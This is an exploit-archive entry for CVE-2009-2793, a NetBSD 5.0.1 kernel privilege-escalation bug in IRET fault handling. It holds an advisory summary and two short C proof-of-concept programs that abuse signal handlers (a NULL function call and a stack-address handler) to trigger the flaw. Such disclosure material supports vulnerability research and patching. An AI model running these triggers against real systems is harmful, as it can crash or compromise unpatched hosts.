NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation

Author: Tavis Ormandy
type: local
platform: bsd
port: 
date_added: 2009-09-16 
date_updated: 2017-11-15 
verified: 1 
codes: CVE-2009-2793;OSVDB-58198 
tags: 
aliases:  
screenshot_url:  
application_url: 

/*
source: https://www.securityfocus.com/bid/36430/info

NetBSD is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks.
*/

/* ... */
int main(int argc, char **argv)
{
  jmp_buf env;

  void handlesig(int n) {
        longjmp(env, 1);

  }
  signal(SIGSEGV, handlesig);

  if (setjmp(env) == 0) {
        ( (void(*)(void)) NULL) ();
  }

  return 0;
}

/* ... */
int main(int argc, char **argv)
{
       char baguette;
       signal(SIGABRT, (void (*)(int))&baguette);
       abort();
}